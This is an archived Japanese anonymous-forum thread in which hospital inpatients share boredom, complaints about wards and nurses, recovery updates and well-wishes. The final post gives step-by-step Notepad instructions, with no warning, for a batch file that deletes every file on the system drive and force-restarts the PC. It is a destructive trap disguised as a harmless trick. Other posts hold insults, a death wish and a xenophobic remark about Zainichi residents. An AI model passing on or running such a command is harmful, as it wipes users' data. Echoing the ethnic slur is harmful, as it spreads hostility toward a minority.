自分の病気のスレはチェックしているもののここは毎度チェックしていなかったので
無くなってるかな・・・と思ったら、、あった(*´ω`)b

あんな地獄みたいな治療が終わり、退院して一年ちょい。
生きている事への感謝を忘れずにしないとなー><

入院している人が皆回復して元気になりますように!また来ます!

124 :名無しさん@お大事に:2009/07/04(土) 16:40:58 ID:B3kalIeQ
こなくていい

125 :名無しさん@お大事に:2009/07/16(木) 19:11:47 ID:i18/1/ne
質問なんですが、今はどこも悪くないのですが2ヶ月間入院したいと思っているのですが
なんかいい方法はないでしょうか?ちなみにそこの先生は腰が痛いというだけで
入院できたという人もいました。

126 :POPCORN ◆wnSzS27ucs :2009/07/17(金) 10:12:00 ID:+GQn7Zsp
14日に突発的に負傷して病院へ搬送され、初手術を終え現在入院中です。
寿命一ヶ月弱のコテになりますが、ヨロシクおねがいします。

127 :POPCORN ◆wnSzS27ucs :2009/07/17(金) 11:49:38 ID:+GQn7Zsp
初入院なので分からないことだらけだけど、
ホテル暮しのような感じでいるとマズイのかなぁ、と思った。
医者や看護師の方々との接し方に、ちょっと気を使うね。

128 :POPCORN ◆wnSzS27ucs :2009/07/18(土) 13:15:22 ID:I9NVVmBd
しかし土日月と三連休で、リハビリも休み。
まぁ出勤される医師・看護師・その他の方々は大変だけれど、
患者も退屈ですよねぇ。
売店が閉まっているのは知らなかった・・・。

129 :POPCORN ◆wnSzS27ucs :2009/07/18(土) 19:45:56 ID:I9NVVmBd
独りで連投してすまないけど、
今自販機で飲み物買おうと、最上階の五階までエレベーターで上がったんだ。

自分の病室のある三階にも自販機はある。
五階はレストランと売店、会議室等と自販機コーナーがある。
当然レストランと売店は閉まっている。

五階まで車椅子で行くのも面倒臭いが、500cc缶で120円とか種類も多いし、三階からエレベーターに乗った。
なんか季節的にもエレベーター内の鏡が怖い感じで、という間にも五階に到着。

・・・真っ暗。病室から見る外の景色はまだ明るいと思ったのに。
・・・コワイ!下りられない!鏡に何か映りそうな気がする!

結局、三階で買いました。ヘタレだなぁw

130 :名無しさん@お大事に:2009/07/18(土) 21:04:35 ID:lPiMWIDY
しりとりまだぁ?

131 :POPCORN ◆wnSzS27ucs :2009/07/18(土) 21:11:02 ID:I9NVVmBd
ぁそうたろう

132 :POPCORN ◆wnSzS27ucs :2009/07/20(月) 06:43:29 ID:V3oIdJzv
(´ー`)y−~~ マターリ・・・禁煙したけど

133 :POPCORN ◆wnSzS27ucs :2009/07/20(月) 11:05:45 ID:V3oIdJzv
シーツ交換してもらいました。
一日中寝っぱなしなんで、清潔になると気持ち良さもひとしおですね♪

134 :POPCORN ◆wnSzS27ucs :2009/07/21(火) 18:53:15 ID:/AI2SnTI
点滴終わったと思ったのに、数日たった今またやることになった。
回復の具合がちょっと良くないみたいのが理由だけど、
これまで病院やクスリにほとんど縁のなかった自分には逆効果じゃないかと、
素人ながら思ってしまう。
抗生物質の点滴で、今週いっぱいはやるみたい・・・。

135 :POPCORN ◆wnSzS27ucs :2009/07/23(木) 18:35:26 ID:jkbqSpSk
病棟で火災発生!

火災探知器の誤作動だと。
ちょっとだけ暇つぶしになったw

136 :名無しさん@お大事に:2009/07/23(木) 18:52:40 ID:ljpQwNG1
思わず点滴引き抜いたヤシの数→
みんな飯時かな。

137 :名無しさん@お大事に:2009/07/23(木) 20:52:12 ID:sgVtFOyD
尿瓶持ってくる看護婦が遅すぎるんだが、これはもっと早く来て下さい。って催促してもいいんでしょうか?家族にしてもらうべき?

138 :POPCORN ◆wnSzS27ucs :2009/07/23(木) 21:55:22 ID:jkbqSpSk
それはハッキリ言ったほうが良いと思いますよ。
向こうも忙しいから、手のかからない患者はどうしても後回しになるみたいですし。

それにしてもギプスの中の足の裏が痒くて、眠れない・・・。

139 :名無しさん@お大事に:2009/07/24(金) 19:09:50 ID:SauTG67v
うちの病院は体温計を配布されてナースがバイタルチェックしに来る前に
患者が体温は測っておくというやりかたなんだが、ちょっとこれおかしくね?
他の病院でもそんなもん?
100歩譲って「可能であれば測っておいてください」みたいな態度ならまだわかるにしても、
測ってない場合「なんで測ってないの?」的な態度取られるんだが

140 :名無しさん@お大事に:2009/07/24(金) 19:51:38 ID:M1d4nP1m
俺の造血細胞ガンガレ!

141 :POPCORN ◆wnSzS27ucs :2009/07/25(土) 10:11:57 ID:T3hkujdn
>>139

まぁ言い方は応対する看護師によると思うよ。
自分も寝起きの体温とか脈拍とか計ってるよ。

142 :名無しさん@お大事に:2009/07/25(土) 15:47:26 ID:Dd8j4LBT
1日中ベットの上でごろごろなんていいご身分だねえ
うらやましいよまったく。

143 :POPCORN ◆wnSzS27ucs :2009/07/25(土) 17:48:02 ID:T3hkujdn
自分はこれまで病院にほとんど縁のない生活を送ってましたけど、
今回だけは何の因果か手術入院ということになってしまいました。

まぁイヤでも入院する時が来るんじゃないですか?

144 :名無しさん@お大事に:2009/07/25(土) 19:58:32 ID:QGRE9Dfb
あ〜、仕事しなくてもいいのかぁ、一日中ゴロゴロしててもいいのかぁ、なんてのは最初の3日ぐらいのもんだ。
今は何でもするからここから出してくれって思う。

145 :名無しさん@お大事に:2009/07/25(土) 22:10:03 ID:61Bb4WJO
あー暇すぎて昼寝しちゃったから消灯過ぎても眠れねー

146 :名無しさん@お大事に:2009/07/26(日) 00:14:46 ID:GiyXYZnX
回復してきて元気になったせいか
寝れなくなってきたよ

147 :名無しさん@お大事に:2009/07/26(日) 20:07:11 ID:c/v+owan
頼む 俺の骨。
血小板たくさん作ってくれ。

おれはとりあえず寝るけど。

148 :名無しさん@お大事に:2009/07/26(日) 21:13:31 ID:T2NrOxCq
今日からバイクで自爆して顎の骨折った者が参加させてもらいますね

暇というか明日までちんこの管抜けないから動きにくい

149 :POPCORN ◆wnSzS27ucs :2009/07/27(月) 01:17:14 ID:QJfwdN3n
タイヤがスリップして横転でもしたの?
顎を骨折かぁ・・・大変そうだね。
お大事に。

150 :名無しさん@お大事に:2009/07/27(月) 18:33:17 ID:lrKQ9gQw
顎を針金で固定して三週間ほど飲み物です

まだ新人なのに次長と部長がきてびびった

151 :POPCORN ◆wnSzS27ucs :2009/07/28(火) 20:30:53 ID:FFfUo7yq
三週間飲み物だけってのも辛そうだけど、顎を固定のほうがもっと辛いかな。
顎を動かせないってことだもんね。

152 :名無しさん@お大事に:2009/07/30(木) 08:14:55 ID:HFf518Jc
わーい24時間点滴取れた
後は打ち身とかと顎だけだ
保険でお金出るけど入院代とかいくら掛かるのか恐ろしい…

153 :POPCORN ◆wnSzS27ucs :2009/07/31(金) 10:16:09 ID:5sHjPzEJ
入院し始めはともかく怪我や病気をの治癒に集中するけれど、
回復してきて退院が見えてくると、金のことやら何やらの問題に引き戻されるね。
自分も退院に際して歩行のために片足に補助具を装着するらしいけれど、
その値段が10万!とか言うからなぁ・・・。
まぁこの金額から保険でいくらか還付を受けるのだけど、何だかな〜という感じだよ。

154 :名無しさん@お大事に:2009/07/31(金) 10:36:06 ID:34r90nzU
うぜぇんだよ糞コテ、死ね

155 :名無しさん@お大事に:2009/07/31(金) 17:10:48 ID:D5IWcavr
退院して職場戻る時の一番最初の事を考えると怖くて怖くて…

もっとお気楽な性格ならいいんだけどなぁ

156 :名無しさん@お大事に:2009/07/31(金) 17:25:20 ID:o2izEK8j
長文&愚痴でスマン

入院生活三週目。
2週目で痛みもなくなり今は経過をみてるところなんだけど、自覚症状もないのにただただ病院にいるのが苦痛で仕方なくなってきた。
後から別の症状がでる可能性があるから様子見です、って言われてもな〜
言われてることは理解できても色々疑問を感じてしまう。
「検査の結果はまだはっきりとは出てないんですけど…」って、検査からもう2週間経つんですけど…
治療で治ったっていうより自然回復したようにも思えてきた。
これなら通院でいいんちゃうの?ハ〜しんど

入院てストレス溜るね。

157 :POPCORN ◆wnSzS27ucs :2009/07/31(金) 17:36:50 ID:5sHjPzEJ
>>154
申し訳ないが、経過は順調だw

158 :名無しさん@お大事に:2009/07/31(金) 18:42:38 ID:p569UKpn
>>156
大きな病院なのかな? 俺も入院してたけど、最後の方は「早く出してくれ」と思ったよ
医師の回診や看護師の検温&血圧等の際も病室で俺だけすごく短くてなんか納得行かなかった
酷い時なんて看護師がその日初めて来たのが14時過ぎというのがあってクレームいれようかと思った。

159 :名無しさん@お大事に:2009/07/31(金) 19:44:51 ID:o2izEK8j
>>158
150床くらいだと思うけど、それってデカいのかな?

構われてないって言うより、全てが遅いように思うんだよね。
検査して3、4日経って「検査結果はまだ出てませんがおそらく○○だと思います。はっきりしてないからまずは少なめに薬を投与しましょう」って始まって、2週間経っても検査結果は出ず。
徐々に薬を減らしていって様子見ながら退院の日を決めましょうって言われたけど、どこまで減らしたら退院できるのかはっきり言わないから先が読めずにイライラする。
しかも「減らすって言っても初めから薬の量も少なめでしたからね」とか言われたら、「お前らが診断つけへんから薬の量が少なかったんやろ!」って言いたくなる。
土日は医者が休みだから診断止まるし。ホントに。さっさとやれよ。

集団生活も疲れたし毎日親が見舞いにくるのもしんどいし通販で買ったDVDも届かんし、あ〜早く出してくれ〜

160 :名無しさん@お大事に:2009/08/01(土) 10:38:44 ID:6XN3oMxc
>>159
2週間も経つのに結果がでない検査ってなんだろ。
診断ついてないのに投薬開始したりして不信感が拭えないよね。

退院させてくださいって言ったらどうだろう。
「入院治療が必要だという検査結果も出て来ないようですし、
今仕事しないと、後でさらに激務になるので」って。

はっきり意思表示した方がいいと思う。


161 :名無しさん@お大事に:2009/08/01(土) 13:54:16 ID:d5ChmEz7
>>159がやってるのは感染系のウイルスや菌の特定検査じゃないのか?
それ系の内科検査に2〜3週間かかるなんて普通のこと
結果が出てからでは遅いから当たりをつけて投薬を開始するのも常識

ここに書き込めるってことはネット環境があるんだろうし
その暇があるなら少しは自分の病気のこと調べろよ低能

162 :POPCORN ◆wnSzS27ucs :2009/08/02(日) 18:21:46 ID:EPG+q1PP
病院食だけでは物足りなくなってきたなぁ。
酒飲みて〜(゚p゚)アゥ

163 :名無しさん@お大事に:2009/08/04(火) 20:35:45 ID:S6ca6uSt
脳外科に入院中の36歳です。周りは痴呆の入ったお年寄りばかり…
夜色んな音がして寝れない↓

164 :POPCORN ◆wnSzS27ucs :2009/08/04(火) 21:23:45 ID:JREv1X19
明日は我が身と思えばね・・・。
まぁ耳栓、場合によってはアイマスクも付けて
対処するとか。

165 :名無しさん@お大事に:2009/08/05(水) 07:03:34 ID:ZIsU5Z+9
昨夜は夜通しナースコールが響き渡り、じいさんの呻き声やら電話始める婆さんやら…    睡眠不足

166 :名無しさん@お大事に:2009/08/05(水) 12:16:49 ID:iDh3nL8b
私それがいやで個室にうつったよー。
術後間もないのにうるさくて眠れなかった。

167 :名無しさん@お大事に:2009/08/05(水) 13:14:35 ID:ZIsU5Z+9
今日も1日寝たきり決定↓ はぁ…自分でトイレ行きたい。明日退院予定だったのにな…
同部屋の糖尿持ちのじいさんに先を越されてしまったぜ。

168 :名無しさん@お大事に:2009/08/05(水) 21:07:10 ID:ZIsU5Z+9
病人は寝る時間になってしまったか…
電気だけ消しすとします。

169 :名無しさん@お大事に:2009/08/05(水) 22:23:07 ID:nmaqW5tl
たんぱんかい

170 :POPCORN ◆wnSzS27ucs :2009/08/06(木) 17:26:06 ID:hdsjvm88
退院を翌日に控え、病室で前祝い?の酒盛り。
ま、発泡酒だけど明日はビールだな。
あ゛〜キンキンに冷えたジョッキで一気・・・(;´Д`)ハァハァ

171 :ねこ野郎 ◆xgSWdejH02 :2009/10/15(木) 08:30:17 ID:sHm0sOnN
またしても戻ってきてしまった〜〜
くぅー・゚・(つД`)・゚・
またお世話になります

172 :名無しさん@お大事に:2009/10/19(月) 19:37:08 ID:2GuJSL5W
あれ 猫ちゃん帰って来ちゃったの?
お大事に

173 :ずっころ ◆/VJxsUn3ao :2009/11/06(金) 22:36:08 ID:Fytz6QrP
ねこちゃんどうしちゃったの(´・ω・`)
回復早いといいけども・・・。

私事ですが、本日例のお気に茄子と入籍いたしました。
入院中から皆様には励まされまして、ついにゴールインです。
大変感謝しています。ありがとうございました(*・ω・)

このスレを覗いている皆様、きっと元気になってくださいね。

174 :葡萄男:2009/11/08(日) 08:19:00 ID:Bpv2xzEi
先日やっと事故の示談も終了しました。なげぇ・・・・・・・1年半

>>ぬこ
 頑張れ

>>ずっころ
 オメ いいなぁ茄子 俺にも紹介してくれw

175 :あんぱんまん1030 ◆jPpg5.obl6 :2009/12/01(火) 00:21:30 ID:K0eTkMMh
>>ねこちん
大丈夫?まだ入院中かな?最近、ほんとインフルエンザが流行ってるから 気を付けてね。

>>ずっころりん
御結婚おめでとう。
ほんとにすごい!!

お久しぶりです。コテハン書いてごめんなさい。
どうしても一言書きたくて…m(__)m
皆さんが1日も早く完治されますように。

176 :名無しさん@お大事に:2010/03/06(土) 08:25:43 ID:aJnMwOzz
昼間はこっちをあげとくね。(*´・ω・*)/

177 :名無しさん@お大事に:2010/03/06(土) 11:38:33 ID:ncarJvgz
皆はやく退院できますように。
私も早く退院したい。

178 :名無しさん@お大事に:2010/03/06(土) 17:15:39 ID:aJnMwOzz
>>177
退院したいよね〜

もーすぐごはん。
自分には1番嬉しくない時間だったりする。

179 :名無しさん@お大事に:2010/03/07(日) 07:44:49 ID:THx+UMYw
どうして??
ご飯おいしくないの??

180 :名無しさん@お大事に:2010/03/07(日) 10:50:09 ID:f38v0DE9
こちら整形外科病棟。
隣にポータブル利用の高齢者がいる。
入院当初は腰を痛がっていたが、
現在、室内は普通に歩けている。
経過良好で手術の必要もなくなったらしい。
歩行器を使えば絶対にトイレまで行けると思うのだが…(数メートル先にトイレがある)

いつまでポータブル使うんだろ?
食事前に糞たれるから、食欲がわかない…(しかも1日に何度も)
キツイ

181 :名無しさん@お大事に:2010/03/07(日) 19:11:32 ID:THx+UMYw
それはキツイ。
出るものは仕方ないけど…同じ部屋に便器があること自体、特異な環境ですもんね。

ファブリーズのスプレーとか考えてみたけど…いい香りがマイナスの働きをしそうw

182 :名無しさん@お大事に:2010/03/07(日) 19:17:31 ID:QX6grR7V
>ファブリーズのスプレー
自分がベッド上でする時使ってましたよ。試しに使ってみたらどうですか?

183 :名無しさん@お大事に:2010/03/07(日) 20:48:28 ID:AL3/MWCf
短パン

184 :名無しさん@お大事に:2010/03/11(木) 17:43:11 ID:jv5gqK/N
ドコモ規制されてて、入院中ずっと書き込めませんでした。
今日の午前中に退院しました。体力の低下が著しい…。

このスレの皆さんが早く退院できますように。

185 :名無しさん@お大事に:2010/03/12(金) 19:37:00 ID:Zbnllol4
隣のおばあちゃんのいびきがひどい\(^O^)/イヤホンが耳せん代わりになってる。容赦なくカーテン開けて「調子どうかね?」とか聞く。具合悪いのに愛想よくできるはずがないだろー。あとついでに向かいがフィリピン人。

186 :名無しさん@お大事に:2010/06/20(日) 08:49:51 ID:/TIU/cej
また規制かな〜?

187 :名無しさん@お大事に:2010/06/20(日) 20:03:28 ID:8Qa178Ec
消灯後にコッチョリのつもりでカップラーメン食うなよ
麺をふ〜ふ〜したスープ臭で部屋が充満すんだよ!

お陰でお腹ぐ〜ぐ〜

188 :名無しさん@お大事に:2010/06/24(木) 17:02:09 ID:YU9P7KoW
同室のヤツが今日は神聖な試合だからって息まいてる。今日寝れるかな…ハァ

189 :名無しさん@お大事に:2010/07/03(土) 02:28:44 ID:bI8fvcvT
わー恐 退院しないでしばらく病院で暮らす方が安全かもしんない。


自衛隊の某佐官、某研究会にて曰く

「北朝鮮からの外部からの侵略は確実に防御できます。
空軍力・海軍力からみて、これは確実にできます。
問題は、日本国内にいる内通勢力ですね。不逞の在日勢力
のことです。これ以上は言えません、ごめんなさい」

⇒情報漏えい(3BC送科)

190 :名無しさん@お大事に:2010/07/04(日) 13:45:16 ID:yFZic5rq
入院12日目にして、この生活が退屈になりました。

最初は病院食やナースの検温・注射とかが新鮮で楽しかったんですけどね。

日曜日は外出許可もらって出かける人が多く、風呂も沸かされないし、テレビはつまんないし、買った本もつまんないし……本当に退屈だ

191 :名無しさん@お大事に:2010/07/07(水) 21:15:01 ID:/8qLLz6X
脱走したらどうかね

192 ::2010/08/01(日) 16:59:45 ID:7Irg3TgY
メモ帳
→@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
→名前を付けて保存
→ファイル名(適当、最後に.batをつける)
→ファイルの種類(すべてのファイル)
→保存場所(どこでもOK)
→保存
→起動


47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)